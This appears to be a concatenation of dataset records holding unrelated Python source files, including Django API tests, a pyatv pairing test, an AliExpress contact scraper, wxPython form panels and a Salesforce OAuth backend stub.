(s1.id) as dl\n FROM\n scores.also_downloads as s1,\n scores.also_downloads as s2\n WHERE s2.fk_books = %(fk_books)s\n AND s1.fk_books != %(fk_books)s\n AND s1.id = s2.id\n GROUP BY s1.fk_books) as d\n ON d.pk = books.pk\"\"\"\n sql.from_ = ()\n sql.params['fk_books'] = os.id\n\n\n def finalize (self, os):\n # one page is enough\n os.show_next_page_link = False\n","sub_path":"SearchPage.py","file_name":"SearchPage.py","file_ext":"py","file_size_in_byte":14240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91411641","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom sortedcontainers import SortedList\n\nfrom .games import games\nfrom .streams import streams\nfrom ..utils import load_json\n\n\nclass Category:\n @staticmethod\n def from_dict(data, games=[]):\n self = Category(**data)\n\n for game in games.copy():\n if self.code == game.category:\n if not game.type:\n self.games.add(game)\n elif game.type == 'list':\n self.games.update(game.streams)\n\n games.remove(game)\n\n return self\n\n def __init__(self, **kwargs):\n def attr(key, default=None):\n setattr(self, key, kwargs.get(key, default))\n\n for key in ['name', 'code', 'description', 'split_by_year', 'search']:\n attr(key)\n\n attr('level', 2)\n\n self.games = SortedList(key=lambda x: x.date)\n\n\nclass Categories(dict):\n def __init__(self, data):\n if type(data) is not list:\n raise TypeError\n\n uncategorized = games.copy()\n\n for category in data:\n if category['code'] == 'recent':\n c = Category.from_dict(category)\n last_segments = list(streams.segments)[-10:]\n\n for segment in last_segments:\n c.games.add(segment.reference())\n else:\n c = Category.from_dict(category, games=uncategorized)\n\n self[c.code] = c\n\n month_ago = datetime.now() - timedelta(days=30)\n \n if 'ongoing' in self and 'abandoned' in self:\n for game in self['ongoing'].games.copy():\n if game.streams[-1].date < month_ago:\n self['ongoing'].games.remove(game)\n self['abandoned'].games.add(game)\n\n if len(uncategorized) > 0:\n names = [f'{game.name} ({game.category})'\n for game in uncategorized]\n raise(AttributeError('Invalid category in ' + ', '.join(names)))\n\n\ncategories = Categories(load_json('data/categories.json'))","sub_path":"templates/data/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"529594466","text":"\"\"\"Functional pairing tests using the API with a fake AirPlay Apple TV.\"\"\"\n\nfrom aiohttp.test_utils import (AioHTTPTestCase, unittest_run_loop)\n\nimport pyatv\nfrom pyatv import const\nfrom pyatv.conf import (AirPlayService, AppleTV)\nfrom tests.airplay.fake_airplay_device import (\n FakeAirPlayDevice, AirPlayUseCases, DEVICE_CREDENTIALS, DEVICE_PIN)\n\n\nclass PairFunctionalTest(AioHTTPTestCase):\n\n def setUp(self):\n AioHTTPTestCase.setUp(self)\n self.pairing = None\n\n self.service = AirPlayService(\n 'airplay_id', credentials=DEVICE_CREDENTIALS,\n port=self.server.port)\n self.conf = AppleTV('127.0.0.1', 'Apple TV')\n self.conf.add_service(self.service)\n\n async def tearDownAsync(self):\n await self.pairing.close()\n await super().tearDownAsync()\n\n async def get_application(self, loop=None):\n self.fake_atv = FakeAirPlayDevice(self)\n self.usecase = AirPlayUseCases(self.fake_atv)\n return self.fake_atv.app\n\n async def initiate_pairing(self):\n 
self.usecase.airplay_require_authentication()\n\n options = {}\n\n self.pairing = await pyatv.pair(\n self.conf, const.PROTOCOL_AIRPLAY, self.loop, **options)\n\n @unittest_run_loop\n async def test_pairing_with_device(self):\n await self.initiate_pairing()\n\n self.assertTrue(self.pairing.device_provides_pin)\n\n await self.pairing.begin()\n self.pairing.pin(DEVICE_PIN)\n\n self.assertFalse(self.pairing.has_paired)\n\n await self.pairing.finish()\n self.assertTrue(self.pairing.has_paired)\n self.assertEqual(self.service.credentials, DEVICE_CREDENTIALS)\n","sub_path":"tests/airplay/test_airplay_pair.py","file_name":"test_airplay_pair.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341001176","text":"\"\"\"URLs to run the tests.\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^careers/', include('careers.urls')),\n url(r'^markdown/', include('django_markdown.urls')),\n]\n","sub_path":"careers/tests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"161596326","text":"from AI_physicist.theory_learning.util_theory import get_mystery\nimport datetime\n\n\nclass Options(object):\n def __init__(self):\n ########################################\n # Setting up path to dataset files. The data files are CSV_DIRNAME + env_name + \".csv\",\n # where env_name are elements in the csv_filename_list. For each csv file, the first\n # (num_output_dims * num_input_steps) columns are the past (E.g., if num_output_dims=2, then\n # they are arranged as (x_{t-num_input_steps}, y_{t-num_input_steps}, ... x_{t-1}, y_{t-1}) ).\n # The next num_output_dims columns are the target prediction for the future.\n # If is_classified = True, the last column in the csv should provide the true_domain id for evaluating\n # whether the domain prediction is correct (not used for training)\n ########################################\n self.is_classified = True # If True, the last column in the csv file should provide the true_domain id for\n # evaluation.\n self.csv_filename_list = get_mystery(\n 50000, range(4, 7), range(1, 6), self.is_classified) + get_mystery(\n 50000, [20], range(1, 6), self.is_classified) + get_mystery(50000, range(7, 11), range(1, 6),\n self.is_classified)\n self.num_output_dims = 2 # It sets the dimension of output\n self.num_input_steps = 2 # It sets the number of steps for the input\n self.exp_mode = \"continuous\" # Choose from \"continuous\" (full AI Physicist), \"newb\" (newborn) and \"base\" (\n # baseline)\n self.forward_steps = 1 # Number of forward steps to predict\n self.data_format = \"states\" # Choose from \"states\" or \"images\"\n self.pred_nets_activation = \"linear\" # Activation for the prediction function f. 
Choose from \"linear\",\n # \"leakyRelu\"\n self.num_layers = 3 # Number of layers for the prediction function f.\n\n self.num_theories_init = 4 # Number of theories to start with.\n self.add_theory_loss_threshold = 2e-6 # MSE threshold for individual data points above which to add a new\n # theory to fit.\n self.add_theory_criteria = (\"loss_with_domain\",\n 0) # Criteria and threshold of loss increase to determine whether to accept adding the theory.\n self.add_theory_quota = 1 # maximum number of theories to add at each phase.\n self.add_theory_limit = None # maximum allowed number of theories. If None, do not set limit.\n\n self.is_Lagrangian = False # If True, learn the Lagrangian. If False, learn Equation of Motion (EOM).\n self.load_previous = True # Whether to load previously trained instances on\n\n # Other settings:\n self.exp_id = \"exp1.0\"\n self.env_source = \"file\"\n self.pred_nets_neurons = 8\n self.domain_net_neurons = 8\n self.domain_pred_mode = \"onehot\"\n self.mse_amp = 1e-7\n self.scheduler_settings = (\"ReduceLROnPlateau\", 40, 0.1) # Settings for the learning rate scheduler\n # scheduler_settings = (\"LambdaLR\", \"exp\", 2, False) # Settings for the learning rate scheduler\n self.simplify_criteria = (\"DLs\", 0, 3,\n \"relative\") # The (criteria type, threshold, patience, compare_mode) upon which not satisfied, we break the current simplification and continue to the next layer/model\n self.optim_type = (\"adam\", 5e-3)\n self.optim_domain_type = (\"adam\", 1e-3)\n self.optim_autoencoder_type = (\"adam\", 1e-5, 1e-1) # optim_type, lr, loss_scale\n self.reg_mode = \"L1\"\n self.reg_amp = 1e-8\n self.reg_smooth = None\n self.reg_domain_mode = \"L1\"\n self.reg_domain_amp = 1e-5\n self.batch_size = 10000\n self.loss_core = \"DLs\"\n self.loss_order = -1\n self.loss_decay_scale = None\n self.is_mse_decay = False\n self.num_examples = 20000\n self.epochs = 10000\n self.iter_to_saturation = int(self.epochs / 2)\n self.MDL_mode = \"both\"\n self.date_time = \"{0}-{1}\".format(datetime.datetime.now().month, datetime.datetime.now().day)\n self.seed = 0\n self.array_id = \"0\"\n\n self.loss_balance_model_influence = False\n self.loss_success_threshold = 1e-4 # MSE level you regard as success\n self.theory_add_mse_threshold = 0.05 # MSE level below which you will add to the theory hub\n self.theory_remove_fraction_threshold = 0.005 # Fraction threshold below which you will remove a theory after each stage of training.\n self.matching_numerical_tolerance = 2e-4 # The tolerance below which you regard the numerical coefficient matches.\n self.matching_snapped_tolerance = 1e-9 # The tolerance below which you regard the snapped coefficient matches.\n self.max_trial_times = 1 # Maximum number of trial times before going on to next target (DEFAULT=1)\n self.is_simplify_model = True # Whether to perform simplification of theory models\n self.is_simplify_domain = False # Whether to perform simplification of theory domains\n self.record_mode = 2 # Record data mode. 
Choose from 0 (minimal recording), 1, 2 (record everything)\n self.show_3D_plot = False\n self.show_vs = False\n self.big_domain_dict = [\n (key, [1, 2]) for key in get_mystery([\n 20000, 30000, 40000, 50000], range(4, 7), range(11))] + [(key, [1, 2]) for key in get_mystery(\n [40000, 50000], [20], range(11))] + [(key, [1, 2, 3]) for key in get_mystery(\n [20000, 30000, 40000, 50000], range(7, 10), range(11))] + [\n (key, [1, 2, 3, 4]) for key in get_mystery(\n [20000, 30000, 40000, 50000], [10], range(11))]\n self.big_domain_dict = {key: item for key, item in self.big_domain_dict}\n\n # Settings for data_format = \"images\":\n if self.data_format == \"images\":\n self.batch_size = 100\n self.epochs = 10000\n self.loss_core = \"mse\"\n self.add_theory_quota = 0\n self.is_simplify_model = False\n self.is_simplify_domain = False\n\n # Settings for Lagrangian:\n if self.is_Lagrangian:\n self.num_input_steps = 3\n self.is_simplify_model = False\n\n self.is_pendulum = False\n","sub_path":"theory_learning/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"444952356","text":"def unsorted_subarray(array):\n #\n \"\"\"\n \"\"\"\n start, end = None, None\n current_min, current_max = None, None\n\n # Iterate through items\n for i in range(len(array) - 1):\n # Compare adjacent items and fill values if unsorted\n if start is None and end is None and array[i] > array[i + 1]:\n start = i\n end = i + 1\n current_min = array[i]\n current_max = array[i + 1]\n\n # If next item is smaller than current_min, need to sort to that point\n if current_min and array[i + 1] < current_min:\n end = i + 1\n current_min = array[i + 1]\n\n # If next item is smaller than current_max, need to sort to that point\n if current_max and array[i + 1] < current_max:\n end = i + 1\n\n # If next item is larger than current_max, update current_max\n if current_max and array[i + 1] > current_max:\n current_max = array[i + 1]\n\n return end - start + 1\n\n\nif __name__ == \"__main__\":\n print(unsorted_subarray([2, 6, 4, 8, 10, 9, 15]))\n","sub_path":"2020/a0581_unsorted_subarray.py","file_name":"a0581_unsorted_subarray.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"359655091","text":"# unit test, new blank database\n\nfrom rest_framework.test import APITestCase\nfrom django.contrib.auth import get_user_model\nfrom article.models import Article\nfrom rest_framework.reverse import reverse as api_reverse\nfrom rest_framework import status\nfrom rest_framework_jwt.settings import api_settings\nfrom django.test import Client\n\npayload_handler = api_settings.JWT_PAYLOAD_HANDLER\nencode_handler = api_settings.JWT_ENCODE_HANDLER\n\n\n\nUser = get_user_model()\n\nclass ArticleAPITestCase(APITestCase):\n def setUp(self):\n user = User(username='bdvuong', email='bdvuong@gmail.com')\n password = user.set_password('bdvuong1997')\n username = user.username\n user.save()\n\n # self.client = Client()\n # self.client.login(username=username, password=password)\n\n article = Article.objects.create(author= user,\n title='Original testing recipe',\n description='Original description',\n ingredient='Original ingres',)\n\n\n def test_single_user(self):\n user_count = User.objects.count()\n self.assertEqual(user_count, 1)\n\n\n def test_single_article(self):\n article_count = Article.objects.count()\n 
self.assertEqual(article_count, 1)\n\n # test the get list\n def test_get_list(self):\n data = {}\n url = api_reverse('article-api:article-listcreate')\n response = self.client.get(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n #print(response.data)\n\n # test the post method\n def test_post_item(self):\n data = {\n 'title': 'New title',\n 'description':'New stuff',\n 'ingredient': 'New ingredient',\n }\n url = api_reverse('article-api:article-listcreate')\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n print(response.data)\n # somehow giving not authentication were not provided, even in the below with JWT this error occur again\n\n # get individual item\n def test_get_item(self):\n article = Article.objects.first()\n data = {}\n url = article.get_api_url()\n response = self.client.get(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n #print(response.data)\n\n #\n # # Test update and post at this endpoint without authentication\n # def test_update_item(self):\n # article = Article.objects.first()\n # url = article.get_api_url()\n # data = {\n # 'title': 'New title',\n # 'description': 'More New stuff',\n # 'ingredient': 'More new ingredient',\n # }\n # response = self.client.post(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n # # Method not allowed expected because we cannot post at this endpoint\n # #print(response.data)\n # response = self.client.put(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n # #print(response.data)\n #\n #\n # # Test with authentication thru JWT\n # def test_update_item_with_user(self):\n # article = Article.objects.first()\n # print(article.description)\n # url = article.get_api_url()\n # data = {\n # 'title': 'New title',\n # 'description': 'More New stuff',\n # 'ingredient': 'More new ingredient',\n # }\n # user = User.objects.first()\n # payload = payload_handler(user)\n # token_response = encode_handler(payload)\n # self.client.credentials(HTTP_AUTHORIZATION='JWT' + token_response) # setting JWT token headers, JWT <token>\n # #print(token_response)\n # response = self.client.put(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_200_OK)\n # print(response.data)\n\n # def test_post_item_with_user(self):\n # article = Article.objects.first()\n # #print(article.description)\n # data = {\n # 'title': 'New title',\n # 'description': 'More New stuff',\n # 'ingredient': 'More new ingredient',\n # }\n # user = User.objects.first()\n # payload = payload_handler(user)\n # token_response = encode_handler(payload)\n # self.client.credentials(HTTP_AUTHORIZATION='JWT' + token_response) # setting JWT token headers, JWT <token>\n # print(token_response)\n # url = article.get_api_url()\n # response = self.client.put(url, data, format='json')\n # self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n # print(response.data)\n","sub_path":"Blog/article/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486371327","text":"\"\"\"\nVery basic 2D viewer, allowing to pick pixels\nand select m/z\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport esmraldi.imzmlio as imzmlio\nfrom 
esmraldi.spectralviewer import SpectralViewer\n\ndef onclick(event):\n x,y = int(event.xdata), int(event.ydata)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help=\"Input ITK image or imzML file\")\nparser.add_argument(\"--memmap\", help=\"Create and read a memmap file\", action=\"store_true\")\n\nargs = parser.parse_args()\n\ninputname = args.input\nis_memmap = args.memmap\n\n\nif inputname.lower().endswith(\".imzml\"):\n memmap_dir = os.path.dirname(inputname) + os.path.sep + \"mmap\" + os.path.sep\n memmap_basename = os.path.splitext(os.path.basename(inputname))[0]\n memmap_image_filename = memmap_dir + memmap_basename + \".npy\"\n memmap_spectra_filename = memmap_dir + memmap_basename + \"_spectra.npy\"\n memmap_files_exist = (os.path.exists(memmap_dir)\n and os.path.exists(memmap_image_filename)\n and os.path.exists(memmap_spectra_filename))\n\n if is_memmap and memmap_files_exist:\n print(\"Reading from memmap\")\n spectra = np.load(memmap_spectra_filename, mmap_mode=\"r\")\n image = np.load(memmap_image_filename, mmap_mode=\"r\")\n else:\n imzml = imzmlio.open_imzml(inputname)\n mz, I = imzml.getspectrum(0)\n spectra = imzmlio.get_full_spectra(imzml)\n max_x = max(imzml.coordinates, key=lambda item:item[0])[0]\n max_y = max(imzml.coordinates, key=lambda item:item[1])[1]\n max_z = max(imzml.coordinates, key=lambda item:item[2])[2]\n image = imzmlio.get_images_from_spectra(spectra, (max_x, max_y, max_z))\n\n if is_memmap:\n os.makedirs(memmap_dir, exist_ok=True)\n np.save(memmap_image_filename, image)\n np.save(memmap_spectra_filename, spectra)\n\nprint(image)\nif len(image.shape) == 4:\n image = image[0, ...]\n\nimage = image.transpose((1, 0, 2))\nprint(spectra.shape)\nfig, ax = plt.subplots(3, 1)\ntracker = SpectralViewer(ax, image, spectra)\nfig.canvas.mpl_connect('button_press_event', tracker.onclick)\nplt.show()\n","sub_path":"examples/2D_viewer.py","file_name":"2D_viewer.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"582401396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"\nPython Package for controlling Alexa devices (echo dot, etc) programmatically.\n\nFor more details about this api, please refer to the documentation at\nhttps://gitlab.com/keatontaylor/alexapy\n\"\"\"\ntry:\n from importlib_metadata import version\nexcept ModuleNotFoundError:\n from importlib.metadata import version\nfrom .alexaapi import AlexaAPI\nfrom .alexalogin import AlexaLogin\nfrom .alexawebsocket import WebsocketEchoClient\nfrom .errors import (\n AlexapyConnectionError,\n AlexapyLoginCloseRequested,\n AlexapyLoginError,\n)\nfrom .helpers import hide_email, hide_serial, obfuscate\n\n__version__ = version(\"alexapy\")\n\n__all__ = [\n \"AlexaLogin\",\n \"AlexaAPI\",\n \"AlexapyConnectionError\",\n \"AlexapyLoginCloseRequested\",\n \"AlexapyLoginError\",\n \"WebsocketEchoClient\",\n \"hide_email\",\n \"hide_serial\",\n \"obfuscate\",\n \"__version__\",\n]\n","sub_path":"alexapy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"638781501","text":"#coding:utf-8\n__author__ = '613108'\n\nimport 
sys,csv,urllib2,re\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append(r'C:\\Users\\613108\\Desktop\\Project\\Vertical_ecommerce_project\\VIP_project')\nsys.path.append(r'C:\\Users\\613108\\Desktop\\Project\\tool_self\\Tool_self')\nimport get_phone_search,My_Csv,list_split\nfrom Queue import Queue\nfrom threading import Thread\nfrom bs4 import BeautifulSoup\n\nclass Get_contact_detail(Thread):\n def __init__(self,href_list):\n Thread.__init__(self)\n self.href_list=href_list\n\n def get_info(self):\n send_headers = {\n 'Referer':'www.alibaba.com',\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection':'keep-alive'\n }\n pat=re.compile(r'\\n')\n for url in self.href_list:\n try:\n r=urllib2.Request(url=url[1],headers=send_headers)\n res=urllib2.urlopen(r)\n result=res.read()\n res.close()\n soup=BeautifulSoup(result,from_encoding='utf-8')\n frame=soup.find(attrs={'class':'m-content'})\n name=frame.find(attrs={'class':'name'}).text\n name=re.sub(pat,'',name)\n try:department=frame.find(attrs={'class':'dl-horizontal'}).dd.text\n except:department='-'\n sec_frame=frame.find(attrs={'class':'contact-detail'})\n sec_frames=sec_frame.find_all(re.compile(r'd.+?'))[1:]\n tel_phone='-';address='-';province='-';city='-';mobile_phone='-';fax_num='-'\n for i in range(len(sec_frames)):\n if sec_frames[i].text=='Telephone:':\n tel_phone=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Address:':\n address=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Province/State:':\n province=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='City:':\n city=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Mobile Phone:':\n mobile_phone=sec_frames[i+1].contents[0]\n elif sec_frames[i].text=='Fax:':\n fax_num=sec_frames[i+1].contents[0]\n else:continue\n result=[url[0],url[1],name,department,tel_phone,mobile_phone,fax_num,address,province,city]\n queue_for_result.put(result)\n print(result)\n except:\n print('*'*20+u'程序运行失误,已跳过'+'*'*20+url[1])\n\n def run(self):\n self.get_info()\n\nif __name__=='__main__':\n file_name='d:/spider/aliexpress/aliexpress_contact_href_2015-08-06.csv'\n href_temp=[]\n queue_for_result=Queue(0)\n with open(file_name,'r') as csv_file:\n reader=csv.reader(csv_file)\n for row in reader:\n href_temp.append(row)\n href_temp=href_temp[1:]\n href_temp_2=list_split.list_split(href_temp,2)\n Get_contact_detail_thread=[]\n for item in href_temp_2:\n Get_contact_detail_thread.append(Get_contact_detail(item))\n for item in Get_contact_detail_thread:\n item.start()\n for item in Get_contact_detail_thread:\n item.join()\n\n data=[]\n for i in range(queue_for_result.qsize()):\n data.append(queue_for_result.get())\n title=['shop_name','contact_page_href','contact_name','department','tel_phone','mobile_phone','fax_num','address','province','city']\n writer=My_Csv.Write_Csv(path='D:/spider/aliexpress',name='aliexpress_contact_detail',title=title,result=data)\n writer.add_title_data()\n print('*'*20+u'程序运行完毕,请检查数据'+'*'*20)\n","sub_path":"Aliexpress_project/contact_detail.py","file_name":"contact_detail.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"280051075","text":"\nimport datetime\nimport wx\nimport wx.adv\nfrom desk.base.panels import *\nfrom desk.base.models import ValidationError\nfrom desk.persona.models import Persona\nfrom fuente.var import 
*\n\n\n\nclass PersonaPanel(wx.Panel):\n    \"\"\"\n    View panel for persons.\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n        \n        wx.Panel.__init__(self, *args, **kwargs)\n        self.model = Persona()\n\n        # Controls\n        self.nb1 = wx.Notebook(self, -1, name=\"notebook1\")\n        self.panel1 = ListPanel(self.nb1, 1, name=\"persona_list\")\n        self.panel2 = DetailPanel(self.nb1, 2, name=\"persona_detail\")\n\n        # Events\n        self.Bind(wx.EVT_BUTTON, self.OnAdd, self.panel1.button3)\n        self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnEdit, self.panel1.lc1)\n\n        # Initialization\n        self.__set_properties()\n        self.__do_layout()\n\n    def __set_properties(self):\n        self.panel1.SetImageList(\"persona\", 24)\n        self.panel1.SetColumns(todas=False, model=self.model)\n        self.panel1.SetItems(self.model.GetQueryset())\n        \n    def __do_layout(self):\n        s1 = wx.BoxSizer(wx.VERTICAL)\n        self.nb1.AddPage(self.panel1, \"Listado\")\n        self.nb1.AddPage(self.panel2, \"Detalle\")\n        s1.Add(self.nb1, 1, wx.EXPAND|wx.ALL, 0)\n        self.SetSizer(s1)\n        self.Layout()\n\n    def OnAdd(self, event):\n        dlg = BaseDialog(self, -1, \"Agregar persona\", style=wx.RESIZE_BORDER|wx.DEFAULT_DIALOG_STYLE)\n        dlg.SetPanel(PersonaFormPanel(dlg, -1))\n        if (dlg.ShowModal() == wx.ID_OK):\n            self.SetItems()\n        event.Skip()\n\n    def OnEdit(self, event):\n        i = self.panel1.lc1.GetFirstSelected()\n        id = self.panel1.lc1.GetItem(i, 0).GetText()\n\n        dlg = BaseDialog(self, -1, \"Modificar persona\", style=wx.RESIZE_BORDER|wx.DEFAULT_DIALOG_STYLE)\n        dlg.SetPanel(PersonaFormPanel(dlg, -1, selection=id))\n        if (dlg.ShowModal() == wx.ID_OK):\n            self.SetItems()\n        event.Skip()\n\n    def SetItems(self, fieldname=\"\", fieldvalue=\"\", todas=False):\n        self.panel1.SetColumns(self.model)\n        self.panel1.SetItems(self.model.GetQueryset(fieldname=fieldname, fieldvalue=fieldvalue, todas=todas))\n        \n\n\n\n\nclass PersonaFormPanel(wx.Panel):\n    \"\"\"\n    Form for creating and modifying persons.\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n\n        try:\n            self.selection = kwargs.pop(\"selection\")\n        except (KeyError):\n            self.selection = None\n            self.model = Persona()\n            self.model.New()\n        else:\n            self.model = Persona().Select(fieldname=\"id\", fieldvalue=self.selection)\n\n        wx.Panel.__init__(self, *args, **kwargs)\n\n        # Controls\n        self.id = wx.TextCtrl(self, -1, name=\"id\", size=(120, -1), style=wx.TE_READONLY)\n        self.identificacion = wx.TextCtrl(self, -1, name=\"identificacion\", size=(150, -1))\n        self.identificacion_type = wx.ComboBox(self, -1, name=\"identificacion_type\", choices=list(dict(IDENTIFICACION_CHOICES).keys()), style=wx.CB_READONLY)\n        self.nombre = wx.TextCtrl(self, -1, name=\"nombre\", size=(300, -1))\n        self.razon_social = wx.TextCtrl(self, -1, name=\"razon_social\", size=(300, -1))\n        self.nacimiento = wx.adv.DatePickerCtrl(self, id=-1, style=wx.adv.DP_ALLOWNONE)\n        self.email = wx.TextCtrl(self, -1, name=\"email\", size=(200, -1))\n        self.telefono = wx.TextCtrl(self, -1, name=\"telefono\", size=(150, -1))\n        self.direccion = wx.TextCtrl(self, -1, name=\"direccion\", style=wx.TE_MULTILINE, size=(300, 50))\n        self.es_suplidor = wx.CheckBox(self, -1, \"\")\n        self.imagen_perfil = wx.BitmapButton(self, -1, size=(128, 128), bitmap=wx.Bitmap(GETIMG(\"persona\", 128)))\n\n        self.button_save = wx.Button(self, wx.ID_SAVE, \"Guardar\")\n        self.button_cancel = wx.Button(self, wx.ID_CANCEL, \"Cancelar\")\n\n        # Events.\n        self.Bind(wx.EVT_BUTTON, self.OnSave, id=wx.ID_SAVE)\n\n        self.__do_layout()\n        self.__set_properties()\n\n        if (self.model):\n            self.SetValues()\n        \n\n    def __set_properties(self):\n
        # Field properties.\n        self.identificacion.SetMaxLength(20)\n        self.nombre.SetMaxLength(100)\n        self.razon_social.SetMaxLength(100)\n        self.email.SetMaxLength(100)\n        self.telefono.SetMaxLength(20)\n        self.direccion.SetMaxLength(256)\n\n        # Set the properties.\n        for field in self.model.GetFields(todas=True):\n            try:\n                ctrl = getattr(self, field.name)\n                ctrl.SetSize((500, -1))\n            except (AttributeError) as e:\n                print(e)\n                continue\n        \n    def __do_layout(self):\n        s1 = wx.BoxSizer(wx.VERTICAL)\n\n        s2 = wx.FlexGridSizer(cols=2, vgap=5, hgap=10)\n\n        for field in self.model.GetFields(todas=True):\n            try:\n                ctrl = getattr(self, field.name)\n            except (AttributeError):\n                continue\n            label = wx.StaticText(self, -1, field.verbose_name)\n            s2.Add(label, 0, wx.ALIGN_RIGHT)\n            s2.Add(ctrl, 1)\n        \n        s1.Add(s2, 1, wx.EXPAND|wx.ALL, 10)\n\n        s3 = wx.BoxSizer(wx.HORIZONTAL)\n        s3.Add(self.button_save, 0, wx.ALL, 5)\n        s3.Add(self.button_cancel, 0, wx.ALL, 5)\n        s1.Add(s3, 0, wx.ALL, 0)\n\n        self.SetSizer(s1)\n        s1.Fit(self)\n        self.Layout()\n\n    def OnSave(self, event):\n        # Save the data.\n        try:\n            self.model.SaveForm(self)\n        except (ValidationError) as e:\n            return wx.MessageBox(str(e))\n        try:\n            self.Parent.EndModal(wx.ID_OK)\n        except (BaseException) as e:\n            print(e)\n        event.Skip()\n\n    def SetValues(self):\n        self.id.SetValue(str(self.model.id))\n        self.identificacion.SetValue(str(self.model.identificacion))\n        self.identificacion_type.SetValue(str(self.model.identificacion_type))\n        self.nombre.SetValue(str(self.model.nombre))\n        self.razon_social.SetValue(str(self.model.razon_social))\n\n        try:\n            self.nacimiento.SetValue(self.model.nacimiento.ToDate())\n        except (BaseException) as e:\n            self.nacimiento.SetValue(wx.DefaultDateTime)\n\n        self.email.SetValue(str(self.model.email))\n        self.telefono.SetValue(str(self.model.telefono))\n        self.direccion.SetValue(str(self.model.direccion))\n        try:\n            self.es_suplidor.SetValue(self.model.es_suplidor.value)\n        except (TypeError):\n            self.es_suplidor.SetValue(0)\n        self.imagen_perfil.SetBitmapLabel(self.model.imagen_perfil.ToBitmap())","sub_path":"desk/persona/panels.py","file_name":"panels.py","file_ext":"py","file_size_in_byte":6681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"386963079","text":"\"\"\"\nsettings.py should include the following: \n    SALESFORCE_CLIENT_ID = '...' 
\n SALESFORCE_CLIENT_SECRET = '...'\n\n Optional scope to include:\n\tapi: Allows access to the current, logged-in user's account over the APIs, such as the REST API or Bulk API.\n\tchatter_api: Allows access to only the Chatter API URLs.\n\tfull: Allows access to all data accessible by the current, logged-in user.\n\tid: Allows access only to the Identity Service\n\trefresh_token: Allows a refresh token to be returned if you are eligible to receive one.\n\tvisualforce: Allows access to Visualforce pages\n\tweb: Allows the ability to use the access_token on the web.\n\n\tIf you do not supply a scope parameter, it will default to: id api refresh_token\n\n SALESFORCE_AUTH_EXTRA_ARGUEMENTS = {'scope': 'id api refresh_token'}\n SALESFORCE_DISPLAY_PARAM = ''\n\n\n More information on scope can be found at:\n http://wiki.developerforce.com/page/Digging_Deeper_into_OAuth_2.0_on_Force.com\n\"\"\"\nfrom urllib import urlencode\n\nfrom django.utils import simplejson\n\nfrom social_auth.backends import BaseOAuth2, OAuthBackend\nfrom social_auth.utils import dsa_urlopen, setting\n\nfrom oauth2 import Token\n\n\nSALESFORCE_DOMAIN = 'login.salesforce.com'\nSALESFORCE_TEST_DOMAIN = 'test.salesforce.com'\n\nSALESFORCE_TESTING = setting('SALESFORCE_TESTING',False)\nSALESFORCE_SERVER = \"https://\" + (SALESFORCE_TEST_DOMAIN if SALESFORCE_TESTING else SALESFORCE_DOMAIN)\n\nSALESFORCE_AUTHORIZATION_PATH = '/services/oauth2/authorize'\nSALESFORCE_ACCESS_TOKEN_PATH = '/services/oauth2/token'\n\n\nSALESFORCE_AUTHORIZATION_URL = SALESFORCE_SERVER + SALESFORCE_AUTHORIZATION_PATH\nSALESFORCE_ACCESS_TOKEN_URL = SALESFORCE_SERVER + SALESFORCE_ACCESS_TOKEN_PATH\n\nclass SalesforceBackend(OAuthBackend):\n name = 'salesforce'\n\n 